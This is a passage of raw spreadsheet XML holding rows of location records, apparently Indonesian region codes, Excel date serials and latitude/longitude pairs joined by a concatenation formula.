      <c r="D4162" t="s">
        <v>22</v>
      </c>
      <c r="E4162" t="s">
        <v>23</v>
      </c>
      <c r="F4162" t="s">
        <v>14221</v>
      </c>
      <c r="G4162" t="s">
        <v>14222</v>
      </c>
      <c r="H4162" t="s">
        <v>26</v>
      </c>
      <c r="I4162" t="s">
        <v>1513</v>
      </c>
      <c r="J4162" t="s">
        <v>6509</v>
      </c>
      <c r="L4162" t="s">
        <v>14223</v>
      </c>
      <c r="M4162">
        <v>6303050001</v>
      </c>
      <c r="N4162">
        <v>6303050</v>
      </c>
      <c r="O4162">
        <v>6303</v>
      </c>
      <c r="P4162">
        <v>63</v>
      </c>
      <c r="Q4162" t="s">
        <v>8767</v>
      </c>
      <c r="R4162" t="s">
        <v>8759</v>
      </c>
      <c r="S4162" t="s">
        <v>8751</v>
      </c>
      <c r="T4162" t="s">
        <v>6513</v>
      </c>
      <c r="U4162" s="5">
        <v>1148449194</v>
      </c>
      <c r="V4162" s="5" t="s">
        <v>18223</v>
      </c>
      <c r="W4162" s="5">
        <v>-33991633</v>
      </c>
      <c r="X4162" t="s">
        <v>21956</v>
      </c>
      <c r="Y4162" t="str">
        <f t="shared" si="64"/>
        <v>-3.3991633,114.8449194</v>
      </c>
    </row>
    <row r="4163" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4163">
        <v>299534</v>
      </c>
      <c r="B4163" s="1">
        <v>44545</v>
      </c>
      <c r="C4163" t="s">
        <v>14224</v>
      </c>
      <c r="D4163" t="s">
        <v>22</v>
      </c>
      <c r="E4163" t="s">
        <v>23</v>
      </c>
      <c r="F4163" t="s">
        <v>14225</v>
      </c>
      <c r="G4163" t="s">
        <v>14226</v>
      </c>
      <c r="H4163" t="s">
        <v>26</v>
      </c>
      <c r="I4163" t="s">
        <v>1504</v>
      </c>
      <c r="J4163" t="s">
        <v>6509</v>
      </c>
      <c r="L4163" t="s">
        <v>14227</v>
      </c>
      <c r="M4163">
        <v>6303050001</v>
      </c>
      <c r="N4163">
        <v>6303050</v>
      </c>
      <c r="O4163">
        <v>6303</v>
      </c>
      <c r="P4163">
        <v>63</v>
      </c>
      <c r="Q4163" t="s">
        <v>8767</v>
      </c>
      <c r="R4163" t="s">
        <v>8759</v>
      </c>
      <c r="S4163" t="s">
        <v>8751</v>
      </c>
      <c r="T4163" t="s">
        <v>6513</v>
      </c>
      <c r="U4163" s="5">
        <v>1148408675</v>
      </c>
      <c r="V4163" s="5" t="s">
        <v>18224</v>
      </c>
      <c r="W4163" s="5">
        <v>-33924053</v>
      </c>
      <c r="X4163" t="s">
        <v>21957</v>
      </c>
      <c r="Y4163" t="str">
        <f t="shared" ref="Y4163:Y4204" si="65">CONCATENATE(X4163,",",V4163)</f>
        <v>-3.3924053,114.8408675</v>
      </c>
    </row>
    <row r="4164" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4164">
        <v>299535</v>
      </c>
      <c r="B4164" s="1">
        <v>44545</v>
      </c>
      <c r="C4164" t="s">
        <v>14228</v>
      </c>
      <c r="D4164" t="s">
        <v>22</v>
      </c>
      <c r="E4164" t="s">
        <v>23</v>
      </c>
      <c r="F4164" t="s">
        <v>14229</v>
      </c>
      <c r="G4164" t="s">
        <v>14230</v>
      </c>
      <c r="H4164" t="s">
        <v>26</v>
      </c>
      <c r="I4164" t="s">
        <v>1633</v>
      </c>
      <c r="J4164" t="s">
        <v>6509</v>
      </c>
      <c r="L4164" t="s">
        <v>14231</v>
      </c>
      <c r="M4164">
        <v>6303052002</v>
      </c>
      <c r="N4164">
        <v>6303052</v>
      </c>
      <c r="O4164">
        <v>6303</v>
      </c>
      <c r="P4164">
        <v>63</v>
      </c>
      <c r="Q4164" t="s">
        <v>10034</v>
      </c>
      <c r="R4164" t="s">
        <v>9004</v>
      </c>
      <c r="S4164" t="s">
        <v>8751</v>
      </c>
      <c r="T4164" t="s">
        <v>6513</v>
      </c>
      <c r="U4164" s="5">
        <v>1148343945</v>
      </c>
      <c r="V4164" s="5" t="s">
        <v>18225</v>
      </c>
      <c r="W4164" s="5">
        <v>-33761973</v>
      </c>
      <c r="X4164" t="s">
        <v>21958</v>
      </c>
      <c r="Y4164" t="str">
        <f t="shared" si="65"/>
        <v>-3.3761973,114.8343945</v>
      </c>
    </row>
    <row r="4165" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4165">
        <v>299536</v>
      </c>
      <c r="B4165" s="1">
        <v>44545</v>
      </c>
      <c r="C4165" t="s">
        <v>14232</v>
      </c>
      <c r="D4165" t="s">
        <v>22</v>
      </c>
      <c r="E4165" t="s">
        <v>23</v>
      </c>
      <c r="F4165" t="s">
        <v>14233</v>
      </c>
      <c r="G4165" t="s">
        <v>14234</v>
      </c>
      <c r="H4165" t="s">
        <v>26</v>
      </c>
      <c r="I4165" t="s">
        <v>27</v>
      </c>
      <c r="J4165" t="s">
        <v>6509</v>
      </c>
      <c r="L4165" t="s">
        <v>14235</v>
      </c>
      <c r="M4165">
        <v>6303052002</v>
      </c>
      <c r="N4165">
        <v>6303052</v>
      </c>
      <c r="O4165">
        <v>6303</v>
      </c>
      <c r="P4165">
        <v>63</v>
      </c>
      <c r="Q4165" t="s">
        <v>10034</v>
      </c>
      <c r="R4165" t="s">
        <v>9004</v>
      </c>
      <c r="S4165" t="s">
        <v>8751</v>
      </c>
      <c r="T4165" t="s">
        <v>6513</v>
      </c>
      <c r="U4165" s="5">
        <v>1148352349</v>
      </c>
      <c r="V4165" s="5" t="s">
        <v>18226</v>
      </c>
      <c r="W4165" s="5">
        <v>-33778396</v>
      </c>
      <c r="X4165" t="s">
        <v>21959</v>
      </c>
      <c r="Y4165" t="str">
        <f t="shared" si="65"/>
        <v>-3.3778396,114.8352349</v>
      </c>
    </row>
    <row r="4166" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4166">
        <v>299540</v>
      </c>
      <c r="B4166" s="1">
        <v>44545</v>
      </c>
      <c r="C4166" t="s">
        <v>14236</v>
      </c>
      <c r="D4166" t="s">
        <v>22</v>
      </c>
      <c r="E4166" t="s">
        <v>23</v>
      </c>
      <c r="F4166" t="s">
        <v>14237</v>
      </c>
      <c r="G4166" t="s">
        <v>14238</v>
      </c>
      <c r="H4166" t="s">
        <v>26</v>
      </c>
      <c r="I4166" t="s">
        <v>111</v>
      </c>
      <c r="J4166" t="s">
        <v>12328</v>
      </c>
      <c r="L4166" t="s">
        <v>14239</v>
      </c>
      <c r="M4166">
        <v>6502080001</v>
      </c>
      <c r="N4166">
        <v>6502080</v>
      </c>
      <c r="O4166">
        <v>6502</v>
      </c>
      <c r="P4166">
        <v>65</v>
      </c>
      <c r="Q4166" t="s">
        <v>14240</v>
      </c>
      <c r="R4166" t="s">
        <v>14241</v>
      </c>
      <c r="S4166" t="s">
        <v>14242</v>
      </c>
      <c r="T4166" t="s">
        <v>12333</v>
      </c>
      <c r="U4166" s="5">
        <v>1172172120</v>
      </c>
      <c r="V4166" s="5" t="s">
        <v>18227</v>
      </c>
      <c r="W4166" s="5">
        <v>30046872</v>
      </c>
      <c r="X4166" t="s">
        <v>21960</v>
      </c>
      <c r="Y4166" t="str">
        <f t="shared" si="65"/>
        <v>3.0046872,117.2172120</v>
      </c>
    </row>
    <row r="4167" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4167">
        <v>299541</v>
      </c>
      <c r="B4167" s="1">
        <v>44545</v>
      </c>
      <c r="C4167" t="s">
        <v>14243</v>
      </c>
      <c r="D4167" t="s">
        <v>22</v>
      </c>
      <c r="E4167" t="s">
        <v>23</v>
      </c>
      <c r="F4167" t="s">
        <v>14244</v>
      </c>
      <c r="G4167" t="s">
        <v>14245</v>
      </c>
      <c r="H4167" t="s">
        <v>26</v>
      </c>
      <c r="I4167" t="s">
        <v>657</v>
      </c>
      <c r="J4167" t="s">
        <v>12328</v>
      </c>
      <c r="L4167" t="s">
        <v>14246</v>
      </c>
      <c r="M4167">
        <v>6502090005</v>
      </c>
      <c r="N4167">
        <v>6502090</v>
      </c>
      <c r="O4167">
        <v>6502</v>
      </c>
      <c r="P4167">
        <v>65</v>
      </c>
      <c r="Q4167" t="s">
        <v>14247</v>
      </c>
      <c r="R4167" t="s">
        <v>14248</v>
      </c>
      <c r="S4167" t="s">
        <v>14242</v>
      </c>
      <c r="T4167" t="s">
        <v>12333</v>
      </c>
      <c r="U4167" s="5">
        <v>1171762162</v>
      </c>
      <c r="V4167" s="5" t="s">
        <v>18228</v>
      </c>
      <c r="W4167" s="5">
        <v>31677634</v>
      </c>
      <c r="X4167" t="s">
        <v>21961</v>
      </c>
      <c r="Y4167" t="str">
        <f t="shared" si="65"/>
        <v>3.1677634,117.1762162</v>
      </c>
    </row>
    <row r="4168" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4168">
        <v>299554</v>
      </c>
      <c r="B4168" s="1">
        <v>44546</v>
      </c>
      <c r="C4168" t="s">
        <v>14249</v>
      </c>
      <c r="D4168" t="s">
        <v>22</v>
      </c>
      <c r="E4168" t="s">
        <v>23</v>
      </c>
      <c r="F4168" t="s">
        <v>14250</v>
      </c>
      <c r="G4168" t="s">
        <v>14251</v>
      </c>
      <c r="H4168" t="s">
        <v>26</v>
      </c>
      <c r="I4168" t="s">
        <v>1538</v>
      </c>
      <c r="J4168" t="s">
        <v>6509</v>
      </c>
      <c r="M4168">
        <v>6303040017</v>
      </c>
      <c r="N4168">
        <v>6303040</v>
      </c>
      <c r="O4168">
        <v>6303</v>
      </c>
      <c r="P4168">
        <v>63</v>
      </c>
      <c r="Q4168" t="s">
        <v>14252</v>
      </c>
      <c r="R4168" t="s">
        <v>8809</v>
      </c>
      <c r="S4168" t="s">
        <v>8751</v>
      </c>
      <c r="T4168" t="s">
        <v>6513</v>
      </c>
      <c r="U4168" s="5">
        <v>1147314155</v>
      </c>
      <c r="V4168" s="5" t="s">
        <v>18229</v>
      </c>
      <c r="W4168" s="5">
        <v>-33118309</v>
      </c>
      <c r="X4168" t="s">
        <v>21962</v>
      </c>
      <c r="Y4168" t="str">
        <f t="shared" si="65"/>
        <v>-3.3118309,114.7314155</v>
      </c>
    </row>
    <row r="4169" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4169">
        <v>299555</v>
      </c>
      <c r="B4169" s="1">
        <v>44546</v>
      </c>
      <c r="C4169" t="s">
        <v>14253</v>
      </c>
      <c r="D4169" t="s">
        <v>22</v>
      </c>
      <c r="E4169" t="s">
        <v>23</v>
      </c>
      <c r="F4169" t="s">
        <v>14254</v>
      </c>
      <c r="G4169" t="s">
        <v>14255</v>
      </c>
      <c r="H4169" t="s">
        <v>26</v>
      </c>
      <c r="I4169" t="s">
        <v>1447</v>
      </c>
      <c r="J4169" t="s">
        <v>6509</v>
      </c>
      <c r="M4169">
        <v>6303040017</v>
      </c>
      <c r="N4169">
        <v>6303040</v>
      </c>
      <c r="O4169">
        <v>6303</v>
      </c>
      <c r="P4169">
        <v>63</v>
      </c>
      <c r="Q4169" t="s">
        <v>14252</v>
      </c>
      <c r="R4169" t="s">
        <v>8809</v>
      </c>
      <c r="S4169" t="s">
        <v>8751</v>
      </c>
      <c r="T4169" t="s">
        <v>6513</v>
      </c>
      <c r="U4169" s="5">
        <v>1147313619</v>
      </c>
      <c r="V4169" s="5" t="s">
        <v>18230</v>
      </c>
      <c r="W4169" s="5">
        <v>-33116697</v>
      </c>
      <c r="X4169" t="s">
        <v>21963</v>
      </c>
      <c r="Y4169" t="str">
        <f t="shared" si="65"/>
        <v>-3.3116697,114.7313619</v>
      </c>
    </row>
    <row r="4170" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4170">
        <v>299603</v>
      </c>
      <c r="B4170" s="1">
        <v>44547</v>
      </c>
      <c r="C4170" t="s">
        <v>14256</v>
      </c>
      <c r="D4170" t="s">
        <v>22</v>
      </c>
      <c r="E4170" t="s">
        <v>23</v>
      </c>
      <c r="F4170" t="s">
        <v>14257</v>
      </c>
      <c r="G4170" t="s">
        <v>14258</v>
      </c>
      <c r="H4170" t="s">
        <v>26</v>
      </c>
      <c r="I4170" t="s">
        <v>1971</v>
      </c>
      <c r="J4170" t="s">
        <v>7277</v>
      </c>
      <c r="L4170" t="s">
        <v>14259</v>
      </c>
      <c r="M4170">
        <v>5103010006</v>
      </c>
      <c r="N4170">
        <v>5103010</v>
      </c>
      <c r="O4170">
        <v>5103</v>
      </c>
      <c r="P4170">
        <v>51</v>
      </c>
      <c r="Q4170" t="s">
        <v>14260</v>
      </c>
      <c r="R4170" t="s">
        <v>9585</v>
      </c>
      <c r="S4170" t="s">
        <v>7281</v>
      </c>
      <c r="T4170" t="s">
        <v>7282</v>
      </c>
      <c r="U4170" s="5">
        <v>1151632126</v>
      </c>
      <c r="V4170" s="5" t="s">
        <v>18231</v>
      </c>
      <c r="W4170" s="5">
        <v>-87818043</v>
      </c>
      <c r="X4170" t="s">
        <v>21964</v>
      </c>
      <c r="Y4170" t="str">
        <f t="shared" si="65"/>
        <v>-8.7818043,115.1632126</v>
      </c>
    </row>
    <row r="4171" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4171">
        <v>299604</v>
      </c>
      <c r="B4171" s="1">
        <v>44547</v>
      </c>
      <c r="C4171" t="s">
        <v>14261</v>
      </c>
      <c r="D4171" t="s">
        <v>22</v>
      </c>
      <c r="E4171" t="s">
        <v>23</v>
      </c>
      <c r="F4171" t="s">
        <v>14262</v>
      </c>
      <c r="G4171" t="s">
        <v>14263</v>
      </c>
      <c r="H4171" t="s">
        <v>26</v>
      </c>
      <c r="I4171" t="s">
        <v>1538</v>
      </c>
      <c r="J4171" t="s">
        <v>7171</v>
      </c>
      <c r="L4171" t="s">
        <v>250</v>
      </c>
      <c r="M4171">
        <v>6403090003</v>
      </c>
      <c r="N4171">
        <v>6403090</v>
      </c>
      <c r="O4171">
        <v>6403</v>
      </c>
      <c r="P4171">
        <v>64</v>
      </c>
      <c r="Q4171" t="s">
        <v>14264</v>
      </c>
      <c r="R4171" t="s">
        <v>14265</v>
      </c>
      <c r="S4171" t="s">
        <v>12981</v>
      </c>
      <c r="T4171" t="s">
        <v>1308</v>
      </c>
      <c r="U4171" s="5">
        <v>1169960046</v>
      </c>
      <c r="V4171" s="5" t="s">
        <v>18232</v>
      </c>
      <c r="W4171" s="5">
        <v>-4342562</v>
      </c>
      <c r="X4171" t="s">
        <v>21965</v>
      </c>
      <c r="Y4171" t="str">
        <f t="shared" si="65"/>
        <v xml:space="preserve"> -0.4342562,116.9960046</v>
      </c>
    </row>
    <row r="4172" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4172">
        <v>299606</v>
      </c>
      <c r="B4172" s="1">
        <v>44547</v>
      </c>
      <c r="C4172" t="s">
        <v>14266</v>
      </c>
      <c r="D4172" t="s">
        <v>22</v>
      </c>
      <c r="E4172" t="s">
        <v>23</v>
      </c>
      <c r="F4172" t="s">
        <v>14267</v>
      </c>
      <c r="H4172" t="s">
        <v>7978</v>
      </c>
      <c r="I4172" t="s">
        <v>7983</v>
      </c>
      <c r="J4172" t="s">
        <v>14268</v>
      </c>
      <c r="L4172" t="s">
        <v>9555</v>
      </c>
      <c r="M4172">
        <v>3175040003</v>
      </c>
      <c r="N4172">
        <v>3175040</v>
      </c>
      <c r="O4172">
        <v>3175</v>
      </c>
      <c r="P4172">
        <v>31</v>
      </c>
      <c r="Q4172" t="s">
        <v>2062</v>
      </c>
      <c r="R4172" t="s">
        <v>2063</v>
      </c>
      <c r="S4172" t="s">
        <v>547</v>
      </c>
      <c r="T4172" t="s">
        <v>33</v>
      </c>
      <c r="U4172" s="5">
        <v>1069133881</v>
      </c>
      <c r="V4172" s="5" t="s">
        <v>18233</v>
      </c>
      <c r="W4172" s="5">
        <v>-61269224</v>
      </c>
      <c r="X4172" t="s">
        <v>21966</v>
      </c>
      <c r="Y4172" t="str">
        <f t="shared" si="65"/>
        <v>-6.1269224,106.9133881</v>
      </c>
    </row>
    <row r="4173" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4173">
        <v>299608</v>
      </c>
      <c r="B4173" s="1">
        <v>44547</v>
      </c>
      <c r="C4173" t="s">
        <v>14269</v>
      </c>
      <c r="D4173" t="s">
        <v>22</v>
      </c>
      <c r="E4173" t="s">
        <v>23</v>
      </c>
      <c r="F4173" t="s">
        <v>14270</v>
      </c>
      <c r="G4173" t="s">
        <v>14271</v>
      </c>
      <c r="H4173" t="s">
        <v>26</v>
      </c>
      <c r="I4173" t="s">
        <v>974</v>
      </c>
      <c r="J4173" t="s">
        <v>7277</v>
      </c>
      <c r="M4173">
        <v>5102080006</v>
      </c>
      <c r="N4173">
        <v>5102080</v>
      </c>
      <c r="O4173">
        <v>5102</v>
      </c>
      <c r="P4173">
        <v>51</v>
      </c>
      <c r="Q4173" t="s">
        <v>13154</v>
      </c>
      <c r="R4173" t="s">
        <v>13155</v>
      </c>
      <c r="S4173" t="s">
        <v>13156</v>
      </c>
      <c r="T4173" t="s">
        <v>7282</v>
      </c>
      <c r="U4173" s="5">
        <v>1150906401</v>
      </c>
      <c r="V4173" s="5" t="s">
        <v>18234</v>
      </c>
      <c r="W4173" s="5">
        <v>-83304977</v>
      </c>
      <c r="X4173" t="s">
        <v>21967</v>
      </c>
      <c r="Y4173" t="str">
        <f t="shared" si="65"/>
        <v>-8.3304977,115.0906401</v>
      </c>
    </row>
    <row r="4174" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4174">
        <v>299612</v>
      </c>
      <c r="B4174" s="1">
        <v>44547</v>
      </c>
      <c r="C4174" t="s">
        <v>14272</v>
      </c>
      <c r="D4174" t="s">
        <v>22</v>
      </c>
      <c r="E4174" t="s">
        <v>23</v>
      </c>
      <c r="F4174" t="s">
        <v>14273</v>
      </c>
      <c r="H4174" t="s">
        <v>7086</v>
      </c>
      <c r="I4174" t="s">
        <v>9331</v>
      </c>
      <c r="J4174" t="s">
        <v>6038</v>
      </c>
      <c r="L4174" t="s">
        <v>14274</v>
      </c>
      <c r="M4174">
        <v>1217080032</v>
      </c>
      <c r="N4174">
        <v>1217080</v>
      </c>
      <c r="O4174">
        <v>1217</v>
      </c>
      <c r="P4174">
        <v>12</v>
      </c>
      <c r="Q4174" t="s">
        <v>14275</v>
      </c>
      <c r="R4174" t="s">
        <v>14276</v>
      </c>
      <c r="S4174" t="s">
        <v>14277</v>
      </c>
      <c r="T4174" t="s">
        <v>6043</v>
      </c>
      <c r="U4174" s="5">
        <v>987555885</v>
      </c>
      <c r="V4174" s="5" t="s">
        <v>18235</v>
      </c>
      <c r="W4174" s="5">
        <v>26480929</v>
      </c>
      <c r="X4174" t="s">
        <v>21968</v>
      </c>
      <c r="Y4174" t="str">
        <f t="shared" si="65"/>
        <v>2.6480929,987.555885</v>
      </c>
    </row>
    <row r="4175" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4175">
        <v>299633</v>
      </c>
      <c r="B4175" s="1">
        <v>44549</v>
      </c>
      <c r="C4175" t="s">
        <v>14278</v>
      </c>
      <c r="D4175" t="s">
        <v>22</v>
      </c>
      <c r="E4175" t="s">
        <v>23</v>
      </c>
      <c r="F4175" t="s">
        <v>14279</v>
      </c>
      <c r="G4175" t="s">
        <v>14280</v>
      </c>
      <c r="H4175" t="s">
        <v>26</v>
      </c>
      <c r="I4175" t="s">
        <v>27</v>
      </c>
      <c r="J4175" t="s">
        <v>6509</v>
      </c>
      <c r="L4175" t="s">
        <v>14281</v>
      </c>
      <c r="M4175">
        <v>6303050003</v>
      </c>
      <c r="N4175">
        <v>6303050</v>
      </c>
      <c r="O4175">
        <v>6303</v>
      </c>
      <c r="P4175">
        <v>63</v>
      </c>
      <c r="Q4175" t="s">
        <v>8925</v>
      </c>
      <c r="R4175" t="s">
        <v>8759</v>
      </c>
      <c r="S4175" t="s">
        <v>8751</v>
      </c>
      <c r="T4175" t="s">
        <v>6513</v>
      </c>
      <c r="U4175" s="5">
        <v>1148748922</v>
      </c>
      <c r="V4175" s="5" t="s">
        <v>18236</v>
      </c>
      <c r="W4175" s="5">
        <v>-34094984</v>
      </c>
      <c r="X4175" t="s">
        <v>21969</v>
      </c>
      <c r="Y4175" t="str">
        <f t="shared" si="65"/>
        <v>-3.4094984,114.8748922</v>
      </c>
    </row>
    <row r="4176" spans="1:25" x14ac:dyDescent="0.25">
      <c r="L4176" t="s">
        <v>14282</v>
      </c>
      <c r="M4176">
        <v>7205081007</v>
      </c>
      <c r="N4176">
        <v>7205081</v>
      </c>
      <c r="O4176">
        <v>7205</v>
      </c>
      <c r="P4176">
        <v>72</v>
      </c>
      <c r="Q4176" t="s">
        <v>14283</v>
      </c>
      <c r="R4176" t="s">
        <v>14284</v>
      </c>
      <c r="S4176" t="s">
        <v>14285</v>
      </c>
      <c r="T4176" t="s">
        <v>7683</v>
      </c>
      <c r="U4176" s="5">
        <v>1196390757</v>
      </c>
      <c r="V4176" s="5" t="s">
        <v>18237</v>
      </c>
      <c r="W4176" s="5">
        <v>-8066417</v>
      </c>
      <c r="X4176" t="s">
        <v>21970</v>
      </c>
      <c r="Y4176" t="str">
        <f t="shared" si="65"/>
        <v xml:space="preserve"> -0.8066417,119.6390757</v>
      </c>
    </row>
    <row r="4177" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4177">
        <v>299635</v>
      </c>
      <c r="B4177" s="1">
        <v>44549</v>
      </c>
      <c r="C4177" t="s">
        <v>14286</v>
      </c>
      <c r="D4177" t="s">
        <v>22</v>
      </c>
      <c r="E4177" t="s">
        <v>23</v>
      </c>
      <c r="F4177" t="s">
        <v>14287</v>
      </c>
      <c r="G4177" t="s">
        <v>14288</v>
      </c>
      <c r="H4177" t="s">
        <v>26</v>
      </c>
      <c r="I4177" t="s">
        <v>27</v>
      </c>
      <c r="J4177" t="s">
        <v>6509</v>
      </c>
      <c r="L4177" t="s">
        <v>14289</v>
      </c>
      <c r="M4177">
        <v>6303050003</v>
      </c>
      <c r="N4177">
        <v>6303050</v>
      </c>
      <c r="O4177">
        <v>6303</v>
      </c>
      <c r="P4177">
        <v>63</v>
      </c>
      <c r="Q4177" t="s">
        <v>8925</v>
      </c>
      <c r="R4177" t="s">
        <v>8759</v>
      </c>
      <c r="S4177" t="s">
        <v>8751</v>
      </c>
      <c r="T4177" t="s">
        <v>6513</v>
      </c>
      <c r="U4177" s="5">
        <v>1148677646</v>
      </c>
      <c r="V4177" s="5" t="s">
        <v>18238</v>
      </c>
      <c r="W4177" s="5">
        <v>-34150237</v>
      </c>
      <c r="X4177" t="s">
        <v>21971</v>
      </c>
      <c r="Y4177" t="str">
        <f t="shared" si="65"/>
        <v>-3.4150237,114.8677646</v>
      </c>
    </row>
    <row r="4178" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4178">
        <v>299638</v>
      </c>
      <c r="B4178" s="1">
        <v>44550</v>
      </c>
      <c r="C4178" t="s">
        <v>14290</v>
      </c>
      <c r="D4178" t="s">
        <v>22</v>
      </c>
      <c r="E4178" t="s">
        <v>23</v>
      </c>
      <c r="F4178" t="s">
        <v>14291</v>
      </c>
      <c r="G4178" t="s">
        <v>14292</v>
      </c>
      <c r="H4178" t="s">
        <v>26</v>
      </c>
      <c r="I4178" t="s">
        <v>1670</v>
      </c>
      <c r="J4178" t="s">
        <v>14293</v>
      </c>
      <c r="L4178" t="s">
        <v>14294</v>
      </c>
      <c r="M4178">
        <v>3174010001</v>
      </c>
      <c r="N4178">
        <v>3174010</v>
      </c>
      <c r="O4178">
        <v>3174</v>
      </c>
      <c r="P4178">
        <v>31</v>
      </c>
      <c r="Q4178" t="s">
        <v>239</v>
      </c>
      <c r="R4178" t="s">
        <v>69</v>
      </c>
      <c r="S4178" t="s">
        <v>32</v>
      </c>
      <c r="T4178" t="s">
        <v>33</v>
      </c>
      <c r="U4178" s="5">
        <v>1067247802</v>
      </c>
      <c r="V4178" s="5" t="s">
        <v>18239</v>
      </c>
      <c r="W4178" s="5">
        <v>-62203294</v>
      </c>
      <c r="X4178" t="s">
        <v>21972</v>
      </c>
      <c r="Y4178" t="str">
        <f t="shared" si="65"/>
        <v>-6.2203294,106.7247802</v>
      </c>
    </row>
    <row r="4179" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4179">
        <v>299639</v>
      </c>
      <c r="B4179" s="1">
        <v>44550</v>
      </c>
      <c r="C4179" t="s">
        <v>14295</v>
      </c>
      <c r="D4179" t="s">
        <v>22</v>
      </c>
      <c r="E4179" t="s">
        <v>23</v>
      </c>
      <c r="F4179" t="s">
        <v>14296</v>
      </c>
      <c r="H4179" t="s">
        <v>26</v>
      </c>
      <c r="I4179" t="s">
        <v>882</v>
      </c>
      <c r="J4179" t="s">
        <v>3135</v>
      </c>
      <c r="L4179" t="s">
        <v>14297</v>
      </c>
      <c r="M4179">
        <v>3671021005</v>
      </c>
      <c r="N4179">
        <v>3671021</v>
      </c>
      <c r="O4179">
        <v>3671</v>
      </c>
      <c r="P4179">
        <v>36</v>
      </c>
      <c r="Q4179" t="s">
        <v>14298</v>
      </c>
      <c r="R4179" t="s">
        <v>454</v>
      </c>
      <c r="S4179" t="s">
        <v>201</v>
      </c>
      <c r="T4179" t="s">
        <v>171</v>
      </c>
      <c r="U4179" s="5">
        <v>1066728044</v>
      </c>
      <c r="V4179" s="5" t="s">
        <v>18240</v>
      </c>
      <c r="W4179" s="5">
        <v>-62198093</v>
      </c>
      <c r="X4179" t="s">
        <v>21973</v>
      </c>
      <c r="Y4179" t="str">
        <f t="shared" si="65"/>
        <v>-6.2198093,106.6728044</v>
      </c>
    </row>
    <row r="4180" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4180">
        <v>299640</v>
      </c>
      <c r="B4180" s="1">
        <v>44550</v>
      </c>
      <c r="C4180" t="s">
        <v>14299</v>
      </c>
      <c r="D4180" t="s">
        <v>22</v>
      </c>
      <c r="E4180" t="s">
        <v>23</v>
      </c>
      <c r="F4180" t="s">
        <v>14300</v>
      </c>
      <c r="G4180" t="s">
        <v>14301</v>
      </c>
      <c r="H4180" t="s">
        <v>26</v>
      </c>
      <c r="I4180" t="s">
        <v>367</v>
      </c>
      <c r="J4180" t="s">
        <v>4487</v>
      </c>
      <c r="L4180" t="s">
        <v>14302</v>
      </c>
      <c r="M4180">
        <v>3171070001</v>
      </c>
      <c r="N4180">
        <v>3171070</v>
      </c>
      <c r="O4180">
        <v>3171</v>
      </c>
      <c r="P4180">
        <v>31</v>
      </c>
      <c r="Q4180" t="s">
        <v>120</v>
      </c>
      <c r="R4180" t="s">
        <v>121</v>
      </c>
      <c r="S4180" t="s">
        <v>108</v>
      </c>
      <c r="T4180" t="s">
        <v>33</v>
      </c>
      <c r="U4180" s="5">
        <v>1068248829</v>
      </c>
      <c r="V4180" s="5" t="s">
        <v>18241</v>
      </c>
      <c r="W4180" s="5">
        <v>-62552636</v>
      </c>
      <c r="X4180" t="s">
        <v>21974</v>
      </c>
      <c r="Y4180" t="str">
        <f t="shared" si="65"/>
        <v>-6.2552636,106.8248829</v>
      </c>
    </row>
    <row r="4181" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4181">
        <v>299641</v>
      </c>
      <c r="B4181" s="1">
        <v>44550</v>
      </c>
      <c r="C4181" t="s">
        <v>14303</v>
      </c>
      <c r="D4181" t="s">
        <v>22</v>
      </c>
      <c r="E4181" t="s">
        <v>23</v>
      </c>
      <c r="F4181" t="s">
        <v>14304</v>
      </c>
      <c r="G4181" t="s">
        <v>14305</v>
      </c>
      <c r="H4181" t="s">
        <v>26</v>
      </c>
      <c r="I4181" t="s">
        <v>1909</v>
      </c>
      <c r="J4181" t="s">
        <v>3135</v>
      </c>
      <c r="L4181" t="s">
        <v>14306</v>
      </c>
      <c r="M4181">
        <v>3671021005</v>
      </c>
      <c r="N4181">
        <v>3671021</v>
      </c>
      <c r="O4181">
        <v>3671</v>
      </c>
      <c r="P4181">
        <v>36</v>
      </c>
      <c r="Q4181" t="s">
        <v>14298</v>
      </c>
      <c r="R4181" t="s">
        <v>454</v>
      </c>
      <c r="S4181" t="s">
        <v>201</v>
      </c>
      <c r="T4181" t="s">
        <v>171</v>
      </c>
      <c r="U4181" s="5">
        <v>1066798854</v>
      </c>
      <c r="V4181" s="5" t="s">
        <v>18242</v>
      </c>
      <c r="W4181" s="5">
        <v>-62245423</v>
      </c>
      <c r="X4181" t="s">
        <v>21975</v>
      </c>
      <c r="Y4181" t="str">
        <f t="shared" si="65"/>
        <v>-6.2245423,106.6798854</v>
      </c>
    </row>
    <row r="4182" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4182">
        <v>299643</v>
      </c>
      <c r="B4182" s="1">
        <v>44551</v>
      </c>
      <c r="C4182" t="s">
        <v>14307</v>
      </c>
      <c r="D4182" t="s">
        <v>85</v>
      </c>
      <c r="E4182" t="s">
        <v>23</v>
      </c>
      <c r="F4182" t="s">
        <v>14308</v>
      </c>
      <c r="G4182" t="s">
        <v>14309</v>
      </c>
      <c r="H4182" t="s">
        <v>26</v>
      </c>
      <c r="J4182" t="s">
        <v>14310</v>
      </c>
      <c r="K4182" t="s">
        <v>14311</v>
      </c>
      <c r="L4182" t="s">
        <v>14312</v>
      </c>
      <c r="M4182">
        <v>3173030003</v>
      </c>
      <c r="N4182">
        <v>3173030</v>
      </c>
      <c r="O4182">
        <v>3173</v>
      </c>
      <c r="P4182">
        <v>31</v>
      </c>
      <c r="Q4182" t="s">
        <v>3224</v>
      </c>
      <c r="R4182" t="s">
        <v>3128</v>
      </c>
      <c r="S4182" t="s">
        <v>62</v>
      </c>
      <c r="T4182" t="s">
        <v>33</v>
      </c>
      <c r="U4182" s="5">
        <v>1068445984</v>
      </c>
      <c r="V4182" s="5" t="s">
        <v>18243</v>
      </c>
